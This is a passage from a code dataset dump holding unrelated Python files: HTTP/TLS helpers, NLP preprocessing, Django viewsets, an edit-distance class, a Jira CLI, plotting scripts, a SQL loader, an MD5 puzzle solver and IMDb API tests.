logging\nimport ssl\nfrom typing import List, Optional\nfrom urllib.parse import ParseResult\n\nLOGGER = logging.getLogger(__name__)\n\nSCHEMES = {\n 'http': {\n 'port': 80\n },\n 'https': {\n 'port': 443\n }\n}\n\n\ndef get_port(url: ParseResult) -> Optional[int]:\n \"\"\"Gets the port\n\n :param url: A parsed url\n :type url: ParseResult\n :raises ValueError: Raised for an unknown scheme\n :return: [description]\n :rtype: The port\n \"\"\"\n if url.scheme not in SCHEMES:\n raise ValueError('unknown scheme')\n return url.port if url.port else SCHEMES[url.scheme]['port']\n\n\ndef get_target(url: ParseResult) -> str:\n \"\"\"Gets the target\n\n :param url: A parsed url\n :type url: ParseResult\n :return: The target\n :rtype: str\n \"\"\"\n path = url.path\n if url.query:\n path += '?' + url.query\n if url.fragment:\n path += '#' + url.fragment\n return path\n\n\ndef get_authority(url: ParseResult) -> str:\n \"\"\"Get the http/2 authority\"\"\"\n if isinstance(url.netloc, str):\n return url.netloc\n host, _port = url.netloc.split(':', maxsplit=1)\n return host\n\n\ndef create_ssl_context(\n cafile: Optional[str],\n capath: Optional[str],\n cadata: Optional[str],\n protocols: List[str]\n) -> ssl.SSLContext:\n \"\"\"Create an ssl context suitable for https\n\n :param cafile: The path of a file of concatenated CA certificates in PEM\n format, defaults to None\n :type cafile: Optional[str], optional\n :param capath: The path to a directory containing CA certificates in PEM\n format, defaults to None\n :type capath: Optional[str], optional\n :param cadata: The data for a PEM encoded certificate, defaults to None\n :type cadata: Optional[str], optional\n :param protocols: The supported protocols\n :type cadata: List[str]\n :return: An ssl context\n :rtype: ssl.SSLContext\n \"\"\"\n ctx = ssl.create_default_context(\n purpose=ssl.Purpose.SERVER_AUTH,\n cafile=cafile,\n capath=capath,\n cadata=cadata\n )\n ctx.options |= (\n ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1\n )\n ctx.options |= ssl.OP_NO_COMPRESSION\n ctx.set_ciphers(\"ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20\")\n ctx.set_alpn_protocols(protocols)\n try:\n ctx.set_npn_protocols(protocols)\n except NotImplementedError:\n LOGGER.debug(\"Can't set npn protocols\")\n return ctx\n\n\ndef get_negotiated_protocol(writer: StreamWriter) -> Optional[str]:\n \"\"\"Get the negotiated protocol if any\n\n :param writer: The writer\n :type writer: StreamWriter\n :return: The negotiated protocol if any.\n :rtype: Optional[str]\n \"\"\"\n ssl_object: Optional[ssl.SSLSocket] = writer.get_extra_info('ssl_object')\n if ssl_object is None:\n return None\n negotiated_protocol = ssl_object.selected_alpn_protocol()\n if negotiated_protocol is None:\n negotiated_protocol = ssl_object.selected_npn_protocol()\n return negotiated_protocol\n","sub_path":"src/bareclient/acgi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243108953","text":"from spellchecker import SpellChecker\n\nimport string\n\nimport nltk\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.stem import PorterStemmer \nfrom nltk.tokenize import word_tokenize as tokenize \nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nfrom textblob import TextBlob\n\ndef loadCorpora():# this function will load corpora and return 2 lists\n\n question=[]\n answer=[]\n with open('Corpora.txt')as file:\n for sent in file.readlines():\n terms=sent.split(\"***\")\n question.append(terms[0])\n answer.append(terms[1])\n\n return question,answer\n\n\n\ndef cleanPunctuationAndLower(sentence):\n clean=cleanPunctuation(sentence)#clean all punctuations in the sentence\n\n clean=clean.lower()#convert everything to lowercase\n return clean\n\n\n\n\ndef StemmingAndLemmatization(inputSen):\n sen=stemming(inputSen)\n \n lemmd= Lemmatization(sen)\n\n return lemmd\n\n\ndef cleanStopWordsAndSpelling(inputSen):\n\n clean_tokens=cleanSW(inputSen)\n\n clean_sentence=correctSpelling(clean_tokens)\n\n return clean_sentence\n\n\ndef findsenti(inputSen): # use to check the input sentiment\n senti=TextBlob(inputSen)\n return senti.polarity\n\n\n\n#helper functions\n\ndef cleanPunctuation(sentence):\n clean=sentence.translate(str.maketrans('','',string.punctuation))#clean all punctuations in the sentence\n return clean\n\n\ndef stemming(inputSen):\n sentence=tokenize(inputSen)\n for x in sentence:\n inputSen=inputSen.replace(x,PorterStemmer().stem(x))# stemming, remove suffixes e.g. playing and play\n return inputSen\n\ndef Lemmatization(inputSen):\n lemmd=[]\n lemmatizer= WordNetLemmatizer()\n token=inputSen.split()\n for x in token:\n lemmd.append(lemmatizer.lemmatize(x)) #lemmatization change all the words back to root form e.g. apples and apple\n ret=(\" \").join(lemmd)\n return ret\n\ndef cleanSW(inputSen):\n\n tokens=tokenize(inputSen)\n clean_tokens=[x for x in tokens if not x in stopwords.words()]# clean all the words with not much meaning in the sentence like 'a', 'is' \n return clean_tokens\n\ndef correctSpelling(inputSen):\n\n spellcheck=SpellChecker()\n correctspell=[spellcheck.correction(clean) for clean in inputSen]# correct spelling\n clean_sentence=(\" \").join(correctspell)\n return clean_sentence\n\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496631112","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.core.exceptions import FieldError\nfrom django.db.models import F\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.decorators import action\nfrom rest_framework import viewsets\nfrom rest_framework import status\n\n\"\"\"\n В этом файле содержатся родительские классы viewsets с расширенным спектром возможностей\n\"\"\"\n\n\n# Родительский класс хранящий методы необходимые\n# для общей группы обьектов\nclass MethodModelViewSet(viewsets.ModelViewSet):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Принудительная фильтрация для всех методов\n # Необходима для работы фильтрации в родительских классах\n def filter_queryset(self, queryset):\n filter_backends = self.filter_backends\n for backend in list(filter_backends):\n queryset = backend().filter_queryset(\n self.request,\n queryset,\n view=self\n )\n return queryset\n\n # Забирает нужные имена выводимых полей из запроса\n # Выводимый набор полей равен списку переданному в заросе\n def get_list_field_values(self, request):\n print(request.user)\n flds = request.query_params.get('values', None)\n if flds:\n flds = flds.strip().strip(' ').split(',')\n else:\n try:\n lst = getattr(self, 'default_list_fields')\n except AttributeError:\n fieldlist = [field.name for field in\n self.serializer_class.Meta.model._meta.fields]\n self.default_list_fields = fieldlist\n self.list_fields = flds if flds else self.default_list_fields\n\n def partial_update(self, request, pk = None):\n model = self.serializer_class.Meta.model\n instance = model.objects.get(id = pk)\n fields = list(map(lambda x: x.name, model._meta.fields))\n data = request.data.copy()\n if 'user' in fields:\n request.data.update({'user': request.user})\n for field in fields:\n attr = data.get(field, None)\n if attr:\n setattr(instance, field, attr)\n print(getattr(instance, 'text'))\n instance.save()\n return Response({'data': data}, status = status.HTTP_200_OK)\n\n def update(self, request, pk = None):\n model = self.serializer_class.Meta.model\n instance = model.objects.get(id = pk)\n fields = list(map(lambda x: x.name, model._meta.fields))\n data = request.data.copy()\n if 'user' in fields:\n request.data.update({'user': request.user})\n for field in fields:\n attr = data.get(field, None)\n if attr:\n setattr(instance, field, attr)\n print(getattr(instance, 'text'))\n instance.save()\n return Response({'data': data}, status = status.HTTP_200_OK)\n\n # Выводит список обьектов с пагинацией\n # Набор полей берет из параметра в очернем классе, либо из запроса\n # если такой есть\n def list(self, request):\n fields_sign = self.get_list_field_values(request)\n queryset = self.filter_queryset(self.queryset)\n page = self.paginate_queryset(queryset)\n serializer = self.get_serializer(\n page,\n many = True,\n fields = self.list_fields\n )\n return self.get_paginated_response(serializer.data)\n","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129984075","text":"\nimport collections\n\n\nclass EditingSequence(object):\n\n ACTION_NONE = 0\n ACTION_INSERT = 1\n ACTION_DELETE = 2\n ACTION_EDIT = 3\n\n COST_NONE = 0\n COST_INSERT = 1\n COST_DELETE = 1\n COST_EDIT = 1\n\n def __init__(self, debug=False):\n self._debug = debug\n self._s = ''\n self._t = ''\n self._cost_table = list()\n self._action_table = list()\n\n def _init_tables(self):\n self._cost_table.append(\n list(range(len(self._s)))\n )\n self._action_table.append(\n [self.ACTION_NONE] + [self.ACTION_DELETE for _ in range(len(self._s))]\n )\n for row_idx in range(1, len(self._t)):\n self._cost_table.append(\n [row_idx] + [0 for _ in range(len(self._s) - 1)]\n )\n self._action_table.append(\n [self.ACTION_INSERT] + [self.ACTION_NONE for _ in range(len(self._s) - 1)]\n )\n\n def _choice_insert(self, row_idx, column_idx):\n prev_cost = self._cost_table[row_idx - 1][column_idx]\n return self.COST_INSERT + prev_cost, self.ACTION_INSERT\n\n def _choice_delete(self, row_idx, column_idx):\n prev_cost = self._cost_table[row_idx][column_idx - 1]\n return self.COST_DELETE + prev_cost, self.ACTION_DELETE\n\n def _choice_edit(self, row_idx, column_idx):\n c_s = self._s[column_idx]\n c_t = self._t[row_idx]\n prev_cost = self._cost_table[row_idx - 1][column_idx - 1]\n if c_s != c_t:\n return self.COST_EDIT + prev_cost, self.ACTION_EDIT\n return self.COST_NONE + prev_cost, self.ACTION_NONE\n\n def _process(self):\n for row_idx in range(1, len(self._t)):\n for column_idx in range(1, len(self._s)):\n best_cost = 0xFFFFFFFF\n action = self.ACTION_NONE\n for cost, ac in (\n self._choice_edit(row_idx, column_idx),\n self._choice_insert(row_idx, column_idx),\n self._choice_delete(row_idx, column_idx),\n ):\n if cost < best_cost:\n best_cost = cost\n action = ac\n self._cost_table[row_idx][column_idx] = best_cost\n self._action_table[row_idx][column_idx] = action\n return self._cost_table[-1][-1]\n\n def actions(self):\n actions = collections.deque()\n row_index = len(self._t) - 1\n column_index = len(self._s) - 1\n while row_index or column_index:\n prev_action = self._action_table[row_index][column_index]\n token = '_'\n if prev_action == self.ACTION_NONE:\n row_index -= 1\n column_index -= 1\n elif prev_action == self.ACTION_EDIT:\n row_index -= 1\n column_index -= 1\n token = 'x'\n elif prev_action == self.ACTION_INSERT:\n column_index -= 1\n token = '+'\n elif prev_action == self.ACTION_DELETE:\n row_index -= 1\n token = '-'\n actions.appendleft(token)\n return ''.join(actions)\n\n def __call__(self, s, t):\n self._s = ' ' + s\n self._t = ' ' + t\n self._cost_table = list()\n self._action_table = list()\n if not (self._s or self._t):\n return 0\n self._init_tables()\n return self._process()\n\n","sub_path":"DP/editingSequence/v3.py","file_name":"v3.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"384956917","text":"\"\"\"Module for defining CLI\"\"\"\n\nfrom os import getcwd\nimport click\nfrom git import Repo, RemoteProgress\nfrom jira import Issue\nfrom utils import branchify\n\n@click.group()\ndef cli():\n \"\"\"Jira management\"\"\"\n\n@click.option('--url', prompt='Please provide the Jira issue url')\n@cli.command()\ndef new(url):\n \"\"\"Start a new Jira ticket\"\"\"\n repo = Repo('/Users/dominic.batten/projects/eigen')\n if repo.is_dirty():\n return click.echo('You have unstaged changes. Aborting')\n issue = Issue(url)\n # branch_input = branchify(\n # click.prompt(\n # 'Please enter branch name',\n # default=issue.default_title(),\n # ),\n # )\n # new_branch = f\"{issue.type()}/{branch_input}/{issue.key()}\"\n # click.echo(f\"Creating new branch {new_branch}\")\n # repo.git.checkout('master')\n # click.echo(\"Pulling latest master\")\n # repo.remotes.origin.pull('master')\n # click.echo(\"Switching to new branch\")\n # current = repo.create_head(new_branch)\n # current.checkout()\n # with open('/tmp/scratch.vim' , 'r') as file:\n # current_notes = file.read(100)\n # overwrite = click.confirm(\n # f\"Overwrite current scratch window?\\n{current_notes}...\",\n # default=True,\n # )\n # if overwrite:\n with open('/tmp/scratch.md' , 'w') as file:\n file.write(issue.description())\n # else:\n # with open('/tmp/scratch.vim' , 'a') as file:\n # file.write(issue.description())\n click.echo(\"Done\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219299417","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 20 16:06:27 2021\n\n@author: ryan\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\n\n\nfont_size_of_the_code = 12#24\nfont = {'family' : 'normal',\n 'weight' : 'bold',\n 'size' : font_size_of_the_code}\nmatplotlib.rc('font', **font)\n\n\n\n\n\n\n\"\"\"\n3D EXPRESSION AND LOCATION PLOTS\n\"\"\"\nfor typ in ['BM','UC']:\n for den in ['high','low']:\n file = 'RNAcounts05_12'+typ+den+'_dense.txt'\n with open(file) as f:\n lines = f.readlines()\n cd = np.array([[float(j) for j in i.split()] for i in lines[1:]]).T\n gene = lines[0].split()\n w = cd[0]\n x = cd[1]/1000\n y = cd[2]/1000\n il8 = cd[3]\n il6 = cd[4]\n ccl11 = cd[5]\n ax = plt.axes(projection='3d')\n ax.scatter3D(x, y, il8, c='yellow')\n ax.scatter3D(x, y, il6, c='cyan')\n ax.scatter3D(x, y, ccl11, c='magenta')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.legend(gene[3:])\n # ax.plot_trisurf(x, y, il6, alpha=0.5, edgecolor='black')\n # plt.show()\n # ax.scatter3D(x, y, il8, c=il8, cmap='plasma');\n # ax.plot_trisurf(x, y, il8, cmap='magma', edgecolor='none');\n ax.view_init(30, 0)\n plt.savefig('Quantification/location_plot_'+file[14:][:-4])\n plt.show()\n \n a = 0.8\n for well in set(w):\n x = [i for i,j in zip(cd[1]/1000,w) if j == well]\n y = [i for i,j in zip(cd[2]/1000,w) if j == well]\n il8 = [(i) for i,j in zip(cd[3],w) if j == well]\n il6 = [(i) for i,j in zip(cd[4],w) if j == well]\n ccl11 = [(i) for i,j in zip(cd[5],w) if j == well]\n fig, axs = plt.subplots(2,2)\n axs[0,0].title.set_text('Well '+str(well)[0]+': '+file[14:][:-4])\n axs[0,0].scatter(x, y, c=il8, cmap='inferno',alpha=a)\n axs[0,1].scatter(x, y, c=il6, cmap='inferno',alpha=a)\n axs[1,0].scatter(x, y, c=ccl11, cmap='inferno',alpha=a)\n axs[1,1].scatter(np.linspace(np.min(x),np.max(x),100)*0, np.linspace(0,1,100), c=np.linspace(np.min(x),np.max(x),100), cmap='inferno',alpha=a)\n axs[1,0].set_xlabel('location [mm]')\n axs[0,0].set_ylabel('il8')\n axs[0,1].set_ylabel('il6')\n axs[1,0].set_ylabel('ccl11')\n axs[1,1].set_xlabel('colorkey')\n axs[1,1].set_ylabel('dots')\n axs[1,1].get_xaxis().set_ticks([])\n # axs[1,1].get_yaxis().set_ticks([])\n # axs[0,0].set_ylim([-20, 20])\n # axs[0,1].set_ylim([-20, 20])\n # axs[1,0].set_ylim([-20, 20])\n # axs[0,0].set_xlim([np.mean(x)-20, np.mean(x)+20])\n plt.tight_layout()\n plt.savefig('Quantification/location_plot_2D_well'+str(well)+'_'+file[14:][:-4]+'.png')\n plt.show()\n \n \n \n ax = plt.axes(projection='3d')\n ax.plot_trisurf(x, y, il8, alpha=0.5, color='yellow')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_il8.png')\n plt.show()\n \n ax = plt.axes(projection='3d')\n ax.plot_trisurf(x, y, il6, alpha=0.5, color='cyan')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_il6.png')\n plt.show()\n \n ax = plt.axes(projection='3d')\n ax.plot_trisurf(x, y, ccl11, alpha=0.5, color='magenta')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_ccl11.png')\n plt.show()\n \n ax = plt.axes(projection='3d')\n ax.scatter3D(x, y, il8, alpha=0.5, color='yellow')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_il8Scatter.png')\n plt.show()\n \n ax = plt.axes(projection='3d')\n ax.scatter3D(x, y, il6, alpha=0.5, color='cyan')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_il6Scatter.png')\n plt.show()\n \n ax = plt.axes(projection='3d')\n ax.scatter3D(x, y, ccl11, alpha=0.5, color='magenta')\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n ax.set_zlabel('Dots')\n ax.view_init(30, 45)\n plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_ccl11Scatter.png')\n plt.show()\n \n ","sub_path":"counting_and_visualization_package/FigS59.py","file_name":"FigS59.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129927364","text":"import re\n\nselectWordWeightGroup = \"\"\"\nselect \n\tword,\n\tavgprob,\n\ttype\nfrom patientdischarge.wordweightgroup\n\"\"\"\n\ninsertDiseaseUniqueWords = \"\"\"\ninsert into patientdischarge.diseaseuniquewords(word, disease) \nvalues (%s, %s)\n\"\"\"\n\nwhiteSpace = \"\\\\s+\"\nsingleSpace = \" \"\n\ndef calculateUniqueWords(connection):\n\tcursor = connection.cursor(buffered=True)\n\n\tcursor.execute(selectWordWeightGroup)\n\t\n\tinternalRepo = {}\n\n\tfor wordWeight in cursor:\n\t\tword = wordWeight[0]\n\t\tcount = float(wordWeight[1])\n\t\tdisease = wordWeight[2]\n\n\t\tif not internalRepo.has_key(disease):\n\t\t\tinternalRepo[disease] = { word: None }\n\t\telse: \n\t\t\tinternalRepo[disease][word] = None\n\n\tcursor.close()\n\tuniqueWordRepo = {}\n\n\tfor diseaseKey in internalRepo:\n\t\t# set up to begin with\n\t\tuniqueWordRepo[diseaseKey] = {}\n\n\t\tfor word in internalRepo[diseaseKey]:\n\n\t\t\t# let's make sure this word doesn't exist in any other dictionary\n\t\t\texists = False\n\t\t\tfor otherDiseaseKey in internalRepo:\n\t\t\t\tif otherDiseaseKey == diseaseKey:\n\t\t\t\t\tcontinue\n\n\t\t\t\tif internalRepo[otherDiseaseKey].has_key(word):\n\t\t\t\t\texists = True\n\t\t\t\t\tbreak\n\n\t\t\tif not exists:\n\t\t\t\tuniqueWordRepo[diseaseKey][word] = None\n\n\tcursor = connection.cursor(buffered=True)\n\t# now, go through other repo and upload results\n\tfor diseaseKey in uniqueWordRepo:\n\t\tfor wordKey in uniqueWordRepo[diseaseKey]:\n\t\t\tcursor.execute(insertDiseaseUniqueWords, (wordKey, diseaseKey))\n\n\tconnection.commit()\n\tcursor.close()","sub_path":"source/loading/diseaseUniqueWords.py","file_name":"diseaseUniqueWords.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"279227110","text":"import hashlib\n\ninn = 'cxdnnyjw'\nk = 0; \nl = 0;\n\ncode = \"\";\nwhile (k<8):\n\tmy_str = inn + str(l)\n\tdh = hashlib.md5(my_str.encode()).hexdigest()\n\tif (dh[0:5] == '00000'):\n\t\tprint(dh)\n\t\tcode += dh[5]\n\t\tk += 1\n\tl += 1\n\t\nprint(' final code: ' + code)","sub_path":"y2016_lev5a.py","file_name":"y2016_lev5a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644647673","text":"# coding: utf-8\nfrom __future__ import absolute_import, unicode_literals\n\nimport time\nimport re\nimport datetime\nfrom operator import itemgetter\n\nimport pytest\nfrom mock import patch\nfrom six.moves.urllib_parse import quote\n\nfrom imdbpie import Imdb\nfrom imdbpie.objects import Image, Person\nfrom imdbpie.exceptions import HTTPError\n\nfrom tests.utils import load_test_data, assert_urls_match, is_valid_url\n\n\nclass TestImdb(object):\n\n imdb = Imdb(locale='en_US', cache=False)\n\n def test_build_url(self):\n imdb_fr = Imdb(locale='en_FR', cache=False)\n imdb_fr.timestamp = time.mktime(datetime.date.today().timetuple())\n\n url = imdb_fr._build_url(\n path='/title/maindetails', params={'tconst': 'tt1111111'})\n\n expected_url = (\n 'https://app.imdb.com/'\n 'title/maindetails'\n '?apiKey=d2bb34ec6f6d4ef3703c9b0c36c4791ef8b9ca9b'\n '&apiPolicy=app1_1'\n '&locale=en_FR'\n '×tamp={timestamp}'\n '&tconst=tt1111111&api=v1&appid=iphone1_1'\n ).format(timestamp=imdb_fr.timestamp)\n\n assert_urls_match(expected_url, url)\n\n def test_build_url_proxied(self):\n imdb_fr = Imdb(\n locale='en_FR',\n cache=False,\n anonymize=True,\n proxy_uri='http://someproxywebsite.co.uk?url={0}'\n )\n imdb_fr.timestamp = time.mktime(datetime.date.today().timetuple())\n\n url = imdb_fr._build_url(\n path='/title/maindetails', params={'tconst': 'tt1111111'})\n\n expected_url = (\n 'http://someproxywebsite.co.uk?url=' +\n quote('https://app.imdb.com/title/maindetails')\n )\n assert url.startswith(expected_url) is True\n\n def test_get_title_plots(self):\n plots = self.imdb.get_title_plots('tt0111161')\n\n expected_plot3 = ('Andy Dufresne is sent to Shawshank Prison for the '\n 'murder of his wife and her secret lover. He is very'\n ' isolated and lonely at first, but realizes there '\n 'is something deep inside your body that people '\n 'can\\'t touch or get to....\\'HOPE\\'. Andy becomes '\n 'friends with prison \\'fixer\\' Red, and Andy '\n 'epitomizes why it is crucial to have dreams. His '\n 'spirit and determination lead us into a world full '\n 'of imagination, one filled with courage and desire.'\n ' Will Andy ever realize his dreams?')\n\n assert len(plots) >= 5\n assert expected_plot3 in plots\n\n def test_get_credits_data(self):\n credits = self.imdb._get_credits_data('tt0111161')\n expected_credits = load_test_data('get_credits_tt0111161.json')\n\n assert len(expected_credits) <= len(credits)\n for index, credit_item in enumerate(expected_credits):\n assert (\n sorted(credit_item, key=itemgetter(1)) ==\n sorted(credits[index], key=itemgetter(1))\n )\n\n def test_get_credits_non_existant_title(self):\n\n with pytest.raises(HTTPError):\n self.imdb._get_credits_data('tt9999999')\n\n def test_get_reviews_data(self):\n reviews = self.imdb._get_reviews_data('tt0111161')\n assert len(reviews) == 10\n\n expected_review_keys = [\n 'status',\n 'user_score',\n 'text',\n 'summary',\n 'user_score_count',\n 'date',\n 'user_name'\n ]\n # other optional keys: user_rating, user_location\n\n # results are changeable so check on data structure\n for review in reviews:\n for key in expected_review_keys:\n assert key in review.keys()\n\n def test_get_title_reviews(self):\n reviews = self.imdb.get_title_reviews('tt0111161')\n assert 10 == len(reviews)\n\n assert reviews[0].username == 'carflo'\n assert reviews[0].date == '2003-11-26'\n assert reviews[0].summary == 'Tied for the best movie I have ever seen'\n\n def test_get_title_reviews_limit(self):\n reviews = self.imdb.get_title_reviews('tt2294629', max_results=20)\n assert 20 == len(reviews)\n\n reviews = self.imdb.get_title_reviews('tt2294629', max_results=31)\n assert 31 == len(reviews)\n\n def test_title_reviews_non_existant_title(self):\n\n with pytest.raises(HTTPError):\n self.imdb.get_title_reviews('tt9999999')\n\n def test_title_exists(self):\n result = self.imdb.title_exists('tt2322441')\n assert True is result\n\n def test_title_exists_non_existant_title(self):\n result = self.imdb.title_exists('tt0000000')\n assert False is result\n\n def test_search_for_title_searching_title(self):\n results = self.imdb.search_for_title('Shawshank redemption')\n expected_top_results = [\n {\n 'imdb_id': 'tt0111161',\n 'title': 'The Shawshank Redemption',\n 'year': '1994',\n 'type': 'feature',\n },\n {\n 'imdb_id': 'tt5443386',\n 'title': 'The Shawshank Redemption: Behind the Scenes',\n 'year': '2004',\n 'type': 'video',\n },\n ]\n assert len(results) > 0\n assert expected_top_results == results[:2]\n\n @pytest.mark.parametrize('query', [\n 'Mission: Impossible',\n 'Honey, I Shrunk the Kids',\n '4.3.2.1. (2010)',\n '500 Days of Summer (2009)',\n '$9.99 (2008)',\n 'Goonies 1986',\n '[REC] (2007)',\n '[REC]² (2009)',\n '[REC]³ Genesis (2012)',\n '¡Three Amigos! (1986)',\n '(Untitled) (2009)',\n ])\n def test_search_for_title_input_with_special_chars(self, query):\n results = self.imdb.search_for_title(query)\n assert len(results) > 0\n\n def test_search_for_person(self):\n results = self.imdb.search_for_person('Andrew Lloyd Webber')\n\n assert len(results) > 0\n expected_results = [\n {'name': 'Andrew Lloyd Webber', 'imdb_id': 'nm0515908'},\n ]\n assert (sorted(expected_results, key=itemgetter('imdb_id')) ==\n sorted(results, key=itemgetter('imdb_id')))\n\n def test_search_for_title_no_results(self):\n results = self.imdb.search_for_title('898582da396c93d5589e0')\n assert [] == results\n\n def test_top_250(self):\n results = self.imdb.top_250()\n\n assert 250 == len(results)\n\n expected_keys = [\n 'rating',\n 'tconst',\n 'title',\n 'image',\n 'num_votes',\n 'year',\n 'can_rate',\n 'type'\n ]\n # results are changeable so check on data structure\n for result in results:\n assert sorted(expected_keys) == sorted(result.keys())\n\n def test_popular_shows(self):\n results = self.imdb.popular_shows()\n\n assert 50 == len(results)\n\n expected_keys = [\n 'tconst',\n 'title',\n # 'image', # optional key\n 'year',\n 'principals',\n 'type'\n ]\n # results are changeable so check on data structure\n for index, result in enumerate(results):\n assert set(expected_keys).issubset(set(result.keys())) is True\n\n def test_popular_movies(self):\n results = self.imdb.popular_movies()\n\n assert 25 == len(results)\n\n expected_keys = [\n 'tconst',\n 'title',\n 'year',\n 'principals',\n 'type'\n ]\n for index, result in enumerate(results):\n assert (\n set(expected_keys).issubset(set(result['object'].keys()))\n is True\n )\n\n def test_get_title_by_id_returns_none_when_is_episode(self):\n imdb = Imdb(exclude_episodes=True)\n assert imdb.get_title_by_id('tt0615090') is None\n\n @patch('imdbpie.imdbpie.Imdb._get')\n def test_get_title_by_id_returns_none_when_no_resp(self, mock_get):\n mock_get.return_value = None\n assert self.imdb.get_title_by_id('tt0111161') is None\n\n def test_get_person_by_id(self):\n person = self.imdb.get_person_by_id('nm0000151')\n\n assert person.name == 'Morgan Freeman'\n assert person.imdb_id == 'nm0000151'\n assert is_valid_url(person.photo_url) is True\n\n @patch('imdbpie.imdbpie.Imdb._get')\n def test_get_person_by_id_returns_none_when_no_resp(self, mock_get):\n mock_get.return_value = None\n assert self.imdb.get_person_by_id('nm0000151') is None\n\n def test_get_title_by_id(self):\n title = self.imdb.get_title_by_id('tt0111161')\n\n assert title.title == 'The Shawshank Redemption'\n assert title.year == 1994\n assert title.type == 'feature'\n assert title.tagline == ('Fear can hold you prisoner. '\n 'Hope can set you free.')\n assert isinstance(title.plots, list) is True\n assert len(title.plots) >= 5\n assert isinstance(title.rating, float) is True\n assert sorted(title.genres) == sorted(['Crime', 'Drama'])\n assert isinstance(title.votes, int) is True\n assert title.runtime == 8520\n\n assert is_valid_url(title.poster_url) is True\n assert is_valid_url(title.cover_url) is True\n assert title.release_date == '1994-10-14'\n assert title.certification == 'R'\n\n for trailer_url in title.trailer_image_urls:\n assert is_valid_url(trailer_url) is True\n\n expected_plot_outline = (\n 'Two imprisoned men bond over a number '\n 'of years, finding solace and eventual redemption through acts '\n 'of common decency.'\n )\n assert title.plot_outline == expected_plot_outline\n\n assert isinstance(title.directors_summary[0], Person)\n assert len(title.directors_summary) == 1\n\n assert len(title.creators) == 0\n assert len(title.cast_summary) == 4\n\n expected_cast_names = ['Tim Robbins', 'Morgan Freeman',\n 'Bob Gunton', 'William Sadler']\n for name in expected_cast_names:\n assert name in [p.name for p in title.cast_summary]\n\n expected_writers = ['Stephen King', 'Frank Darabont']\n for name in expected_writers:\n assert name in [p.name for p in title.writers_summary]\n\n assert len(title.credits) >= 327\n assert (\n sorted(load_test_data('expected_credits.json')) ==\n sorted([p.imdb_id for p in title.credits])\n )\n assert isinstance(title.credits[10], Person)\n\n assert len(title.trailers) == 3\n\n def test_get_title_by_id_using_proxy(self):\n imdb = Imdb(locale='en_US', cache=False, anonymize=True)\n title = imdb.get_title_by_id('tt0111161')\n\n assert title.title == 'The Shawshank Redemption'\n assert title.year == 1994\n assert title.type == 'feature'\n assert title.tagline == ('Fear can hold you prisoner. '\n 'Hope can set you free.')\n assert isinstance(title.plots, list) is True\n assert len(title.plots) >= 5\n assert isinstance(title.rating, float) is True\n assert sorted(title.genres) == sorted(['Crime', 'Drama'])\n assert isinstance(title.votes, int) is True\n assert title.runtime == 8520\n assert len(title.trailers) == 3\n\n def test_get_title_by_id_redirection_result(self):\n assert self.imdb.get_title_by_id('tt0000021') is None\n\n def test_get_title_by_id_excludes_episodes(self):\n assert self.imdb.get_title_by_id('tt3181538') is not None\n\n imdb = Imdb(exclude_episodes=True)\n title = imdb.get_title_by_id('tt3181538')\n\n assert title is None\n\n def test_get_episodes(self):\n assert self.imdb.get_title_by_id('tt0303461') is not None\n\n imdb = Imdb()\n episodes = imdb.get_episodes('tt0303461')\n assert episodes is not None\n\n assert len(episodes) == 14\n episode_1 = 